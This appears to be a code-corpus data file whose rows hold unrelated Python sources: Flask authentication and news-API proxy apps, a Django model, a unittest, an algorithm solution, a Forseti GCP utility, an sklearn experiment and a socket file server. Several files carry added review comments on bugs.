text stringlengths 38 1.54M |
|---|
#!/usr/bin/env python
"""
Copyright (c) 2012, 2013, 2014 Centarra Networks, Inc.
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice, this permission notice and all necessary source code
to recompile the software are included or otherwise available in all
distributions.
This software is provided 'as is' and without any warranty, express or
implied. In no event shall the authors be liable for any damages arising
from the use of this software.
"""
import blinker
import time
from digest import app, db
from digest.login.user import Session, get_session_user, login_required, User
from flask import session, redirect, url_for, escape, request, jsonify, escape, render_template
# Module-level blinker signals that decouple session bookkeeping from the
# request handlers below; receivers attach via @<signal>.connect_via(app).
login_signal = blinker.Signal('A signal sent when the user logs in')
logout_signal = blinker.Signal('A signal sent when the user logs out')
authfail_signal = blinker.Signal('A signal sent when the user fails authentication')
@login_signal.connect_via(app)
def handle_session_login(*args, **kwargs):
    """Create a server-side Session for the user and record the sign-in time."""
    logged_in = kwargs.pop('user', None)
    new_session = Session(logged_in)
    # Mirror the session identifiers into the signed client-side cookie.
    session['session_id'] = new_session.id
    session['session_challenge'] = new_session.challenge
    logged_in.signin_time = time.time()
    db.session.add(logged_in)
    db.session.commit()
@logout_signal.connect_via(app)
def handle_session_logout(*args, **kwargs):
    """Destroy the server-side Session and drop the cookie-side markers."""
    stored = Session.query.filter_by(id=session['session_id']).first()
    if stored:
        db.session.delete(stored)
        db.session.commit()
    # Remove the identifiers from the client cookie in either case.
    session.pop('session_id')
    session.pop('session_challenge')
def validate_login(username, password):
    """Check credentials and fire the matching signal.

    Sends authfail_signal (with a reason) and returns False on a missing,
    disabled, or wrong-password account; otherwise sends login_signal and
    returns True.
    """
    account = User.query.filter_by(username=username).first()
    if account is None or not account.enabled:
        authfail_signal.send(app, user=account, reason='Invalid username')
        return False
    if account.validate_password(password) is False:
        authfail_signal.send(app, user=account, reason='Invalid password')
        return False
    # Password validation was successful, fire the login event.
    login_signal.send(app, user=account)
    return True
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Render the login form; on POST, validate credentials and redirect."""
    if request.method != 'POST':
        return render_template('login.html')
    ok = validate_login(request.form['username'], request.form['password'])
    if ok is not False:
        return redirect(url_for('index'))
    # Failed attempt: clear any stale session markers before re-rendering.
    session.pop('session_id', None)
    session.pop('session_challenge', None)
    return render_template('login.html', error='Invalid username or password')
@app.route('/logout')
def logout():
    """Fire the logout signal for the current session user, then go home."""
    current = get_session_user()
    if current is not None:
        logout_signal.send(app, user=current)
    return redirect(url_for('index'))
@app.route('/create', methods=['GET', 'POST'])
def create():
    """Render the signup form; on POST, validate input and create the account.

    On success the client is immediately given a new Session (logged in)
    and redirected to the 'outmodule' form target (default 'index').
    Validation failures re-render the form with an error message.
    """
    if request.method == 'POST':
        redir_target = request.form.get('outmodule', 'index')
        try:
            # .strip() removes whitespace from both ends already; the
            # original .strip().rstrip() chain was redundant.
            username = request.form['username'].strip()
            password = request.form['password'].strip()
            email = request.form['email'].strip()
            if len(username) == 0:
                return render_template('create.html', error='No username provided')
            # escape() changing the string means it contained HTML-special chars.
            if escape(username) != username or ' ' in username:
                return render_template('create.html', error='Username contains invalid characters')
            if len(password) == 0:
                return render_template('create.html', error='No password provided')
            if len(email) == 0:
                return render_template('create.html', error='No email provided')
            if escape(email) != email or '@' not in email:
                return render_template('create.html', error='E-mail address is malformed')
            user = User(username, email, password)
        except Exception:
            # BUG FIX: was a bare `except:` that also caught SystemExit and
            # KeyboardInterrupt.  A duplicate-username error from User(...)
            # is the expected failure here (presumably a DB integrity error
            # -- TODO confirm), hence the message.
            return render_template('create.html', error='Username is already taken')
        if user is not None:
            sess = Session(user)
            session['session_id'] = sess.id
            session['session_challenge'] = sess.challenge
        return redirect(url_for(redir_target))
    return render_template('create.html')
@app.route('/reset', methods=['GET', 'POST'])
def reset_ui():
    """Password-reset request form: look up the account and e-mail a reset key."""
    if request.method != 'POST':
        return render_template('lost-password.html')
    username = request.form.get('username', '').strip().rstrip()
    email = request.form.get('email', '').strip().rstrip()
    from digest.login.user import User
    match = User.query.filter_by(username=username).filter_by(email=email).first()
    if not match:
        return render_template('lost-password.html', error='The information provided does not match any account on file')
    match.set_pwreset_key()
    match.send_email('Please confirm your password reset request', 'email/lost-password-confirm.txt')
    return render_template('lost-password.html', error='A confirmation message has been sent to the e-mail address on file')
@app.route('/reset-confirm/<pwreset_key>', methods=['GET', 'POST'])
def reset_confirm(pwreset_key):
    """Second reset step: the key from the e-mail selects the account (404 otherwise)."""
    target = User.query.filter_by(pwreset_key=pwreset_key).first_or_404()
    if request.method != 'POST':
        return render_template('lost-password-confirm.html', user=target)
    new_password = request.form['password'].strip().rstrip()
    target.assign_password(new_password)
    # Rotate the key so the confirmation link cannot be replayed.
    target.set_pwreset_key()
    return redirect(url_for('login'))
@app.context_processor
def user_information_from_session():
    """Expose the logged-in user (if any) to every template as `user`."""
    current = get_session_user()
    return {'user': current} if current is not None else {}
|
from django.db import models
from .organization import Organization
class TaskList(models.Model):
    """A titled list of tasks owned by an Organization, ordered by creation time."""

    title = models.CharField(max_length=100)
    datetime = models.DateTimeField(auto_now_add=True, null=True)
    organization = models.ForeignKey(Organization, on_delete=models.PROTECT)

    class Meta:
        ordering = ['datetime']

    def __str__(self):
        return f'{self.datetime} {self.title}'
import unittest
from main import scale
class TestSum(unittest.TestCase):
    """Checks for main.scale: each char repeats `w` times per row, each row `h` times."""

    a = "abcd\nefgh\nijkl\nmnop"
    r = ("aabbccdd\naabbccdd\naabbccdd\neeffgghh\neeffgghh\neeffgghh\n"
         "iijjkkll\niijjkkll\niijjkkll\nmmnnoopp\nmmnnoopp\nmmnnoopp")

    def test(self):
        self.assertEqual(scale(self.a, 2, 3), self.r)
        self.assertEqual(scale("", 5, 5), "")
        self.assertEqual(scale("Kj\nSH", 1, 2), "Kj\nKj\nSH\nSH")


if __name__ == '__main__':
    unittest.main()
|
from math import *
from collections import *
from heapq import *
class Solution:
    def minCost(self, maxTime: int, edges, passingFees) -> int:
        """Minimum total passing fee to travel from vertex 0 to n-1 within maxTime.

        Dijkstra ordered by accumulated fee; a popped state is expanded only
        when it reaches its vertex strictly earlier than any previous
        expansion there (equal-or-later arrival can never improve the fee,
        which only grows along a path).

        Args:
            maxTime: maximum allowed total travel time.
            edges: iterable of (u, v, time) undirected edges.
            passingFees: passingFees[i] is the fee paid on entering vertex i.

        Returns:
            The minimum fee, or -1 if the trip cannot be made within maxTime.
        """
        n = len(passingFees)
        adj = defaultdict(list)
        for u, v, t in edges:
            adj[u].append((v, t))
            adj[v].append((u, t))
        best_time = [inf] * n
        # Heap entries: (total fee so far, vertex, elapsed time).
        heap = [(passingFees[0], 0, 0)]
        while heap:
            # BUG FIX: the original called heapq.heappop/heapq.heappush, but
            # the file only does `from heapq import *`, so the name `heapq`
            # was undefined and every call raised NameError.
            fee, u, tu = heappop(heap)
            if tu > maxTime:
                continue
            if u == n - 1:
                return fee
            if best_time[u] > tu:
                best_time[u] = tu
                for v, t in adj[u]:
                    heappush(heap, (fee + passingFees[v], v, tu + t))
        return -1
|
# Copyright 2017 The Forseti Security Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Util for generic operations for Resources."""
from google.cloud.forseti.common.gcp_type import backend_service
from google.cloud.forseti.common.gcp_type import billing_account
from google.cloud.forseti.common.gcp_type import bucket
from google.cloud.forseti.common.gcp_type import cloudsql_instance
from google.cloud.forseti.common.gcp_type import ke_cluster
from google.cloud.forseti.common.gcp_type import dataset
from google.cloud.forseti.common.gcp_type import folder
from google.cloud.forseti.common.gcp_type import groups_settings
from google.cloud.forseti.common.gcp_type import instance
from google.cloud.forseti.common.gcp_type import organization as org
from google.cloud.forseti.common.gcp_type import project
from google.cloud.forseti.common.gcp_type import resource
from google.cloud.forseti.common.gcp_type import role
from google.cloud.forseti.common.gcp_type import table
from google.cloud.forseti.services import utils
# Maps ResourceType identifiers to the metadata the factory functions below
# rely on: 'class' (the concrete gcp_type class), 'plural' (display form,
# also matched by pluralize()/type_from_name()), and 'can_create_resource'
# (gates create_resource() and create_resource_from_json()).
_RESOURCE_TYPE_MAP = {
    resource.ResourceType.ORGANIZATION: {
        'class': org.Organization,
        'plural': 'Organizations',
        'can_create_resource': True,
    },
    resource.ResourceType.BILLING_ACCOUNT: {
        'class': billing_account.BillingAccount,
        'plural': 'Billing Accounts',
        'can_create_resource': True,
    },
    resource.ResourceType.FOLDER: {
        'class': folder.Folder,
        'plural': 'Folders',
        'can_create_resource': True,
    },
    resource.ResourceType.PROJECT: {
        'class': project.Project,
        'plural': 'Projects',
        'can_create_resource': True,
    },
    resource.ResourceType.BACKEND_SERVICE: {
        'class': backend_service.BackendService,
        'plural': 'Backend Services',
        # The only type that cannot be built via the factory functions.
        'can_create_resource': False,
    },
    resource.ResourceType.BUCKET: {
        'class': bucket.Bucket,
        'plural': 'Buckets',
        'can_create_resource': True,
    },
    resource.ResourceType.CLOUD_SQL_INSTANCE: {
        'class': cloudsql_instance.CloudSQLInstance,
        'plural': 'Cloud SQL Instances',
        'can_create_resource': True,
    },
    resource.ResourceType.DATASET: {
        'class': dataset.Dataset,
        'plural': 'Datasets',
        'can_create_resource': True,
    },
    resource.ResourceType.INSTANCE: {
        'class': instance.Instance,
        'plural': 'GCE Instances',
        'can_create_resource': True,
    },
    resource.ResourceType.KE_CLUSTER: {
        'class': ke_cluster.KeCluster,
        'plural': 'GKE Clusters',
        'can_create_resource': True,
    },
    resource.ResourceType.ROLE: {
        'class': role.Role,
        'plural': 'Roles',
        'can_create_resource': True,
    },
    resource.ResourceType.TABLE: {
        'class': table.Table,
        'plural': 'Tables',
        'can_create_resource': True,
    },
    resource.ResourceType.GROUPS_SETTINGS: {
        'class': groups_settings.GroupsSettings,
        'plural': 'Groups Settings',
        'can_create_resource': True,
    },
}
def create_resource(resource_id, resource_type, **kwargs):
    """Factory to create a certain kind of Resource.

    Args:
        resource_id (str): The resource id.
        resource_type (str): The resource type.
        **kwargs (dict): Extra args.

    Returns:
        Resource: The new Resource based on the type, if supported,
            otherwise None.
    """
    entry = _RESOURCE_TYPE_MAP.get(resource_type)
    if entry is None or not entry.get('can_create_resource'):
        return None
    return entry.get('class')(resource_id, **kwargs)
def create_resource_from_db_row(row):
    """Create a resource type from a database resource row.

    Recurses up the parent chain so the returned resource carries its
    full ancestry.

    Args:
        row (Resource): the database resource row.

    Returns:
        Resource: the concrete resource type.
    """
    if row.parent:
        parent = create_resource_from_db_row(row.parent)
    else:
        parent = None
    return create_resource_from_json(row.type, parent, row.data)
def create_resource_from_json(resource_type, parent, json_string):
    """Factory to create a certain kind of Resource from JSON data.

    Args:
        resource_type (str): The resource type.
        parent (Resource): parent resource of this type.
        json_string (str): resource's JSON data.

    Returns:
        Resource: The new Resource based on the type, if supported,
            otherwise None.
    """
    entry = _RESOURCE_TYPE_MAP.get(resource_type)
    if entry is None or not entry.get('can_create_resource'):
        return None
    return entry.get('class').from_json(parent, json_string)
def get_ancestors_from_full_name(full_name):
    """Creates a Resource for each resource in the full ancestry path.

    Args:
        full_name (str): The full resource name from the model, includes all
            parent resources in the hierarchy to the root organization.

    Returns:
        list: A list of Resource objects, from parent to base ancestor.
    """
    return [
        create_resource(resource_id, resource_type)
        for resource_type, resource_id
        in utils.get_resources_from_full_name(full_name)
    ]
def pluralize(resource_type):
    """Determine the pluralized form of the resource type.

    Args:
        resource_type (str): The resource type for which to get its plural form.

    Returns:
        str: The pluralized version of the resource type, if supported,
            otherwise None.
    """
    entry = _RESOURCE_TYPE_MAP.get(resource_type)
    return entry.get('plural') if entry is not None else None
def type_from_name(resource_name):
    """Determine resource type from resource name.

    Args:
        resource_name (str): The unique resource name, with the format
            "{resource_type}/{resource_id}".

    Returns:
        str: The resource type, if it exists, otherwise None.
    """
    if not resource_name:
        return None
    # First map entry whose lower-cased plural prefixes the name wins.
    return next(
        (rtype for rtype, metadata in _RESOURCE_TYPE_MAP.items()
         if resource_name.startswith(metadata['plural'].lower())),
        None,
    )
def cast_to_gcp_resources(resources_to_cast):
    """Get a list of Resource objects from a list of dict resource descriptors.

    Args:
        resources_to_cast (list): A list of resource descriptors
            as dictionaries, e.g.
            [{'resourceId': {'id': '3456', 'type': 'Project'}},
             {'resourceId': {'id': '1234', 'type': 'Organization'}}]

    Returns:
        list: A list of cast Resource objects.
    """
    return [
        create_resource(descriptor['resourceId']['id'],
                        descriptor['resourceId']['type'])
        for descriptor in resources_to_cast
    ]
|
"""Noisy spectral-classification experiment.

Loads observations and class labels, perturbs them with Gaussian noise,
fits a cross-validated one-vs-rest logistic regression, then applies the
fitted model to a different-resolution (8-class) data set and plots the
summed predicted probabilities for each midpoint class.
"""
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model
from sklearn import metrics, neighbors
from sklearn import preprocessing
# BUG FIX: sklearn.cross_validation was deprecated in 0.18 and removed in
# 0.20; train_test_split and cross_val_score live in sklearn.model_selection.
from sklearn.model_selection import train_test_split, cross_val_score

Observations = np.genfromtxt("./Observations.csv", dtype=float, defaultfmt="%.3e", delimiter=',')
ClassLabels = np.genfromtxt("./ClassLabels.csv", dtype=float, defaultfmt="%d", delimiter=',')

# Perturb the observations with zero-mean Gaussian noise.
sigma = 0.09
mu = 0
Observations = Observations + (sigma * np.random.randn(Observations.shape[0], Observations.shape[1]) + mu)
plt.plot(Observations[0, :])

X_train, X_test, y_train, y_test = train_test_split(
    Observations, ClassLabels, test_size=0.3, random_state=123)

# Analyze standard deviations per feature.
stds = np.apply_along_axis(np.std, 0, Observations)
plt.plot(stds)

logreg = linear_model.LogisticRegressionCV(multi_class="ovr", Cs=20)
EQfit = logreg.fit(X_train, y_train)
# Alternative model kept for reference:
# n_neighbors = 50
# KNN = neighbors.KNeighborsClassifier(n_neighbors, weights='uniform')
# EQfit = KNN.fit(X_train, y_train)

predicted = EQfit.predict(X_test)
probs = EQfit.predict_proba(X_test)
ConfMatrix = metrics.confusion_matrix(y_test, predicted)
ScoreMetric = metrics.accuracy_score(y_test, predicted)
# Scores with various random inits:
scores = cross_val_score(EQfit, Observations, ClassLabels, cv=10)

# Now that we learned on the low-res data, apply the model to the high-res set.
ObservationsDiffRes = np.genfromtxt("../8Class/Observations.csv", dtype=float, defaultfmt="%.3e", delimiter=',')
ClassLabelsDiffRes = np.genfromtxt("../8Class/ClassLabels.csv", dtype=float, defaultfmt="%d", delimiter=',')
ObservationsDiffRes = ObservationsDiffRes + (
    sigma * np.random.randn(ObservationsDiffRes.shape[0], ObservationsDiffRes.shape[1]) + mu)

OrigLab = ClassLabelsDiffRes
# Keep only the midpoint classes (1, 2, 5, 6) and their observations.
inds_midpoints = np.in1d(ClassLabelsDiffRes, (1, 2, 5, 6))
ClassLabelsDiffRes = ClassLabelsDiffRes[inds_midpoints]
ObservationsDiffRes = ObservationsDiffRes[inds_midpoints, :]

probsDiffRes = EQfit.predict_proba(ObservationsDiffRes)
PredictedDiffRes = EQfit.predict(ObservationsDiffRes)

# Summed predicted class probabilities for each midpoint class.
for midPoint in [1, 2, 5, 6]:
    midpoint_in_DiffRes = np.in1d(ClassLabelsDiffRes, (midPoint,))
    averageValues = np.sum(probsDiffRes[midpoint_in_DiffRes, :], axis=0)
    fig, ax = plt.subplots(1)
    ax.plot(averageValues)
    ax.set_title("Class %d " % (midPoint))
|
from flask import Flask, jsonify
import requests
from flask_cors import CORS
from os import link
import os
from bs4 import BeautifulSoup
import re
import json
import yfinance as yf
from pymongo import MongoClient
# mongo DB
# Connection target comes from the MONGO_DB env var (hostname), defaulting
# to a local mongod on the standard port 27017.
client = MongoClient(os.environ.get('MONGO_DB', 'localhost'), 27017)
db = client.news
posts = db.posts
app = Flask(__name__)
CORS(app)  # allow cross-origin requests from the frontend
# weather- Weatherbit.io API
# Required API keys -- os.environ[...] raises KeyError at startup if unset.
WEATHER_KEY = os.environ['WEATHER_KEY']
NEWS_KEY = os.environ['NEWS_KEY']
ALPHA_VANTAGE_KEY = os.environ['ALPHA_VANTAGE_KEY']
@app.route('/api/weather/<country>/<city>', methods=['GET'])
def weather(country, city):
    """Proxy the Weatherbit current-conditions endpoint for city/country."""
    API_KEY = WEATHER_KEY
    # BUG FIX: the original URL had a stray '=' after the city value
    # ("...city={city}=&country=..."), corrupting the query string.
    url = f'https://api.weatherbit.io/v2.0/current?city={city}&country={country}&key={API_KEY}'
    resp = requests.get(url)
    return resp.content
# news- News API
@app.route('/api/news/<country>', methods=['GET'])
def news(country):
    """Top headlines for a country via the News API (up to 100 results)."""
    endpoint = (
        'http://newsapi.org/v2/top-headlines'
        f'?country={country}'
        '&pageSize=100'
        f'&apiKey={NEWS_KEY}'
    )
    return requests.get(endpoint).content
# world news- News API
@app.route('/api/world', methods=['GET'])
def world():
    """English world news from a fixed set of outlets via the News API."""
    API_KEY = NEWS_KEY
    # BUG FIX: the original was missing the '&' after the domains list, so
    # the query string contained "theguardian.comsortBy=popularity" and the
    # sortBy parameter was silently lost.
    url = ('https://newsapi.org/v2/everything?'
           'domains=bbc.com,cnn.com,theguardian.com&'
           'sortBy=popularity&'
           'pageSize=100&'
           'language=en&'
           f'apiKey={API_KEY}')
    response = requests.get(url)
    return response.content
# sport- News API
@app.route('/api/sport/<q>', defaults={'language': 'en'}, methods=['GET'])
@app.route('/api/sport/<q>/<language>', methods=['GET'])
def sport(q, language):
    """Search articles matching `q`, optionally restricted to a language."""
    endpoint = (
        'https://newsapi.org/v2/everything'
        f'?q={q}'
        '&pageSize=20'
        f'&language={language}'
        f'&apiKey={NEWS_KEY}'
    )
    return requests.get(endpoint).content
# currency- ALPHA VANTAGE API
# sending some data to MongoDB for better performance
@app.route('/api/currency/<fromCurrency>/<toCurrency>', methods=['GET'])
def currency(fromCurrency, toCurrency):
    """Exchange rate via Alpha Vantage, cached (indefinitely) in MongoDB.

    NOTE(review): the cache ignores the requested pair -- whichever pair was
    fetched first is returned for every later request.  Confirm intended.
    """
    collection = db.currency
    cached = list(collection.find())
    if cached:
        return cached[0]['currency']
    API_KEY = ALPHA_VANTAGE_KEY
    url = ('https://www.alphavantage.co/query?function=CURRENCY_EXCHANGE_RATE&'
           f'from_currency={fromCurrency.upper()}&'
           f'to_currency={toCurrency.upper()}&'
           f'apikey={API_KEY}')
    data = requests.get(url)
    collection.insert_one({'currency': data.content})
    return data.content
# company look up- ALPHA VANTAGE API
@app.route('/api/company/<company_name>', methods=['GET'])
def company(company_name):
    """Ticker-symbol search for a company name via Alpha Vantage."""
    endpoint = (
        'https://www.alphavantage.co/query?function=SYMBOL_SEARCH&'
        f'keywords={company_name}&'
        f'apikey={ALPHA_VANTAGE_KEY}'
    )
    return requests.get(endpoint).content
# daily stock- ALPHA VANTAGE API
@app.route('/api/stock/<symbol>', methods=['GET'])
def stock(symbol):
    """Daily time series for a ticker symbol via Alpha Vantage."""
    endpoint = (
        'https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&'
        f'symbol={symbol}&'
        f'apikey={ALPHA_VANTAGE_KEY}'
    )
    return requests.get(endpoint).content
# company stock check - yahoo finance API
# sending some data to MongoDB for better performance
@app.route('/api/yahoo', methods=['GET'])
def yahoo():
    """Year-to-date weekly closing prices for a fixed ticker basket.

    The first request downloads from Yahoo Finance and caches the result in
    MongoDB; later requests serve the cached document.  NOTE(review): the
    cache is never invalidated, so the served data goes stale.
    """
    collection = db.stock
    x = list(collection.find())
    if len(x) == 0:
        data = yf.download(
            tickers="SPY AAPL MSFT DIS GOOGL BP KO FB WMT",
            period="ytd",
            interval="1wk",
            group_by='ticker',
            auto_adjust=True,
            prepost=True)
        # Cross-section of the per-ticker 'Close' columns -> one row per week.
        json_file = data.xs('Close', level=1, axis=1).reset_index().to_json(
            orient='records')
        collection.insert_one({'stocks': json.loads(json_file)})
        return json_file
    else:
        return jsonify(x[0]['stocks'])
@app.route('/api/science', methods=['GET'])
def science():
    """Scrape nature.com/news headlines and serve them, cached in MongoDB.

    (Per the original author's note, scraping nature.com is permitted by its
    robots.txt.)  The first request scrapes and stores the article list;
    subsequent requests serve the cached copy.
    """
    collection = db.science
    cached = list(collection.find())
    if cached:
        # BUG FIX: the original returned the raw pymongo documents (a list
        # containing ObjectId values), which Flask cannot serialize.
        return jsonify(cached[0]['articles'])
    res = requests.get('https://www.nature.com/news')
    soup = BeautifulSoup(res.text, 'html.parser')
    # Links to the article pages.
    links = [link.get('href')
             for link in soup.findAll('a', class_='u-flex__container',
                                      attrs={'href': re.compile("^http://")})]
    # Article images (protocol-relative src attributes).
    images = []
    for article in soup.find_all('div', class_='u-responsive-ratio'):
        images.extend('http:' + img['src'] for img in article.findAll('img'))
    # Article titles.
    titles = []
    for card in soup.find_all('div', class_='c-card__copy--major'):
        titles.extend(el.getText() for el in card.find_all(class_='c-card__title'))
    # Descriptions.
    description = [text.getText()
                   for text in soup.find_all('div', class_='c-card__standfirst--major')]
    # Publication dates.
    date = []
    for footer in soup.find_all('div', class_='c-card__footer--major'):
        date.extend(s.getText() for s in footer.find_all('span', class_='c-card__date'))
    # Assemble one record per article (the date list bounds the count).
    data = [{'link': links[x], 'img': images[x],
             'title': titles[x], 'description': description[x],
             'date': date[x]}
            for x in range(len(date))]
    # BUG FIX: the original never wrote to MongoDB, so the cache check above
    # could never hit and every request re-scraped the site.
    collection.insert_one({'articles': data})
    return json.dumps(data)
if __name__ == "__main__":
    # Bind to all interfaces (container/dev deployment); Flask default port.
    app.run(host='0.0.0.0')
|
# Count down from 11 to 1, one number per line.
for number in range(11, 0, -1):
    print(number)
import socket
import os
import shutil
import logging
import json
import hashlib
import binascii
from threading import Thread
"""
pwd - print working directory name
ls - shows inner of working dir
cat <filename> - shows inner of file
mkdir <dir name> - make dir
remdir <dir name> - delete dir with evrthng in it
rm <filename> - delete file
rename <filename> - rename file
sends <filename1> <filename2> - send f1 to server as f2
sendc <filename1> <filename2> - send f1 to client as f2
cd <..>/<dir_name> - change dir <1 lvl down>/<1 lvl up>
"""
PORT = 1556  # TCP port the file server listens on
# All client activity is rooted under ./docs; cur_dir tracks the current
# working directory (module-global, shared by every client thread).
hom_dir = os.path.join(os.getcwd(), 'docs')
cur_dir = hom_dir
def hash_password(password: str) -> str:
    """Hash `password` with PBKDF2-HMAC-SHA512 over a fresh random salt.

    Returns a 192-char ascii string: 64 hex chars of salt followed by
    128 hex chars of derived key -- the layout verify_password() expects.
    """
    salt_hex = hashlib.sha256(os.urandom(60)).hexdigest().encode('ascii')
    derived = hashlib.pbkdf2_hmac('sha512', password.encode('utf-8'), salt_hex, 100000)
    return (salt_hex + binascii.hexlify(derived)).decode('ascii')
def verify_password(stored_password: str, provided_password: str) -> bool:
    """Check `provided_password` against a hash_password()-style record.

    The first 64 chars of `stored_password` are the hex salt; the rest is
    the hex PBKDF2-HMAC-SHA512 digest.
    """
    salt, expected = stored_password[:64], stored_password[64:]
    candidate = hashlib.pbkdf2_hmac(
        'sha512',
        provided_password.encode('utf-8'),
        salt.encode('ascii'),
        100000,
    )
    return binascii.hexlify(candidate).decode('ascii') == expected
def connection_with_auth(sock):
    """Accept one TCP connection and authenticate it against data_users.

    Known addresses ("ip:port") must supply their stored password; unknown
    addresses register a name/password pair, which is persisted to
    data_users.json.  Returns (conn, addr, name), or (None, None, None)
    when registration input is missing.

    NOTE(review): keying accounts by "ip:port" means a returning client on a
    new ephemeral port is treated as a brand-new user -- confirm intended.
    """
    conn, addr = sock.accept()
    address = ':'.join([str(i) for i in addr])
    if address in data_users['users']:
        conn.send(f"Hello {data_users['users'][address]['name']}! Enter passw".encode())
        # Loop until the correct password is received.
        while True:
            data_password = conn.recv(1024).decode()
            if not data_password:
                conn.send(f"Incorrect passw".encode())
            else:
                if verify_password(data_users['users'][address]['password'], data_password):
                    conn.send(f"Welcome".encode())
                    break
                else:
                    conn.send(f"Incorrect passw".encode())
                    conn.send("Enter passw".encode())
    else:
        # Registration flow for a previously unseen address.
        conn.send(f"Name:".encode())
        data_name = conn.recv(1024).decode()
        conn.send(f"Passw:".encode())
        data_pass = conn.recv(1024).decode()
        if not data_name or not data_pass:
            conn.send(f"Incorrect".encode())
            return None, None, None
        # Persist the new account immediately so it survives restarts.
        data_users['users'][address] = {'name': data_name, 'password': hash_password(data_pass)}
        with open('data_users.json', 'w') as file:
            json.dump(data_users, file)
        conn.send(f"Welcome {data_name}. Password added".encode())
    # conn.send("Ok".encode())
    return conn, addr, data_users['users'][address]['name']
class ClientThread(Thread):
    """Serves one authenticated client: receives commands, sends responses.

    Commands are the ones listed in the module docstring (pwd/ls/cat/mkdir/
    remdir/rm/rename/sends/sendc/cd).  NOTE(review): cur_dir and hom_dir are
    module-level globals shared by every client thread, so concurrent
    clients change each other's working directory.
    """

    def __init__(self, conn, addr, name):
        Thread.__init__(self)
        self.conn = conn  # connected socket for this client
        self.addr = addr  # (ip, port) tuple
        self.ip = addr[0]
        self.port = addr[1]
        self.name = name  # authenticated user name
        logger.info(f"Connect client {addr[0]}:{addr[1]}")

    def run(self):
        """Receive/respond loop; exits on 'stop', empty read, or reset.

        NOTE(review): after a ConnectionResetError the socket is closed but
        the loop continues, so the next recv() will raise on a closed
        socket.  Also, process() returns None for the 'sendc' branch, which
        makes response.encode() below raise AttributeError.
        """
        while True:
            try:
                data = self.conn.recv(1024).decode()
                if data == 'stop' or not data:
                    logger.info(f"Disconnect client {self.addr[0]}:{self.addr[1]}")
                    self.conn.close()
                    break
                else:
                    logger.info(f"From client {self.addr[0]}:{self.addr[1]} - {data}")
                    response = self.process(data)
                    logger.info(f"To client {self.addr[0]}:{self.addr[1]} - {response}")
                    try:
                        self.conn.send(response.encode())
                    except BrokenPipeError:
                        logger.info(f"Disconnect client {self.addr[0]}:{self.addr[1]}")
                    # conn.send(data.upper())
            except ConnectionResetError:
                self.conn.close()

    def process(self, req):
        """Execute one command string and return the textual response."""
        global cur_dir
        global hom_dir
        try:
            # Crude prefix whitelist; anything else is rejected below.
            bool_var = False
            for i in ['pwd', 'ls', 'cat', 'mkdir', 'remdir', 'rm', 'rename', 'sends', 'sendc', 'cd']:
                if req.startswith(i):
                    bool_var = True
                    break
            assert bool_var, "Incorrect command"
            if req == 'pwd':
                return cur_dir
            elif req == 'ls':
                return '; '.join(os.listdir(cur_dir))
            elif req[:3] == 'cat':
                filename = req[4:]
                if filename not in os.listdir(cur_dir):
                    return "Dir doesnt exist"
                else:
                    with open(os.path.join(cur_dir, filename), 'r', encoding='utf-8') as f:
                        inner = f.read()
                    return inner
            elif req[:5] == 'mkdir':
                filename = req[6:]
                if filename in os.listdir(cur_dir):
                    # NOTE(review): message is inverted -- the dir EXISTS here.
                    return "Dir doesnt exist"
                else:
                    # NOTE(review): a bare dir name never starts with the
                    # absolute cur_dir path, so this almost always returns
                    # "Err"; the traversal check presumably meant to test
                    # the joined path -- confirm and fix.
                    if filename.startswith(cur_dir):
                        os.mkdir(os.path.join(cur_dir, filename))
                        return 'Dir ' + req[6:] + ' created'
                    else:
                        return "Err"
            elif req[:6] == 'remdir':
                filename = req[7:]
                if filename not in os.listdir(cur_dir):
                    return "Dir doesnt exist"
                else:
                    shutil.rmtree(os.path.join(cur_dir, filename))
                    return 'Dir ' + req[7:] + ' deleted'
            elif req[:2] == 'rm':
                filename = req[3:]
                if filename not in os.listdir(cur_dir):
                    return "File doesnt exist"
                else:
                    os.remove(os.path.join(cur_dir, filename))
                    return 'File ' + req[3:] + ' deleted'
            elif req[:6] == 'rename':
                lst = list(req.split())
                if len(lst) != 3:
                    return "Incorrect args"
                else:
                    if lst[1] not in os.listdir(cur_dir):
                        return "File doesnt exist"
                    else:
                        os.rename(os.path.join(cur_dir, lst[1]), os.path.join(cur_dir, lst[2]))
                        return 'File ' + lst[1] + ' renamed to ' + lst[2]
            elif req[:5] == 'sends':
                # "sends <name> <content>": store content under ./server/<name>.
                lst = list(req.split(' ', 2))
                if lst[1] in os.listdir(os.path.join(os.getcwd(), 'server')):
                    return "Can't rewrite file"
                else:
                    with open(os.path.join(os.path.join(os.getcwd(), 'server'), lst[1]), 'w', encoding='utf-8') as f2:
                        f2.write(' '.join(lst[2:]))
                    return "File copied"
            elif req[:5] == 'sendc':
                # Push ./server/<src> back to the client under a new name.
                # NOTE(review): returns None, which breaks run() (see above).
                lst = list(req.split())
                with open(os.path.join(os.path.join(os.getcwd(), 'server'), lst[1]), 'r', encoding='utf-8') as f1:
                    inner = f1.read()
                string = 'sendc ' + lst[2] + ' ' + inner
                self.conn.send(string.encode())
            elif req[:2] == 'cd':
                if len(req)==2:
                    return "Err"
                elif req[3:5] == '..':
                    # Go one level up, but never above the hom_dir sandbox.
                    parts = cur_dir.split("/")
                    pathing = "/".join(parts[:-1])
                    if pathing.startswith(hom_dir):
                        os.chdir(pathing)
                    else:
                        return "Err"
                else:
                    pathing = cur_dir + '/' + req[3:]
                    if pathing.startswith(hom_dir):
                        os.chdir(pathing)
                    else:
                        return "Err"
                # NOTE(review): os.chdir/cur_dir are process-wide, not
                # per-client -- every thread shares this state.
                cur_dir = os.getcwd()
                return "Dir changed"
        except AssertionError:
            return "Incorrect command"
# --- module bootstrap: load the user registry, configure logging, serve ---
try:
    with open("data_users.json", "r") as read_file:
        data_users = json.load(read_file)
except FileNotFoundError:
    # First run: start with an empty registry and create the file.
    with open("data_users.json", 'wt') as write_file:
        data_users = {'users': {}}
        json.dump(data_users, write_file)

# Timestamped records go to server.log.
